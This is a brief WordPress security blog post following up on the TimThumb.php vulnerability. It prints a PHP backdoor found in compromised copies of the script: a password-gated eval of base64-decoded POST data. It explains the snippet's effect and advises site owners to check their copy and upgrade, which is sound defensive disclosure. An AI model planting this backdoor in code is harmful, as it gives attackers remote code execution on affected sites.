Free WordPress Security Mini Course

Comments   |   WordPress Security

Follow Up on WordPress TimThumb Security Hack

Last month we reported on a wordpress security hole found in the popular script TimThumb.php. If your site got compromised with the TimThumb vulnerability, be sure to check that script to see if it was not modified to act as a backdoor as well. Here’s the code you are looking for:

if (md5 (md5($_POST[‘p’]))===’xxx8ab2ab.. a4ec61072xxx’)
die (eval ( base64_decode ($_POST[‘c’])));

Yikes! That code essentially receives a password via the “p” POST and if it is correct, it executes any PHP code sent by the attackers in the “c” POST variable.

Better yet, if your theme requires timthumb.php, just replace your version with the latest version (2.8 as of this writing) from the TimThumb Google Code page here: http://code.google.com/p/timthumb/

Leave a Reply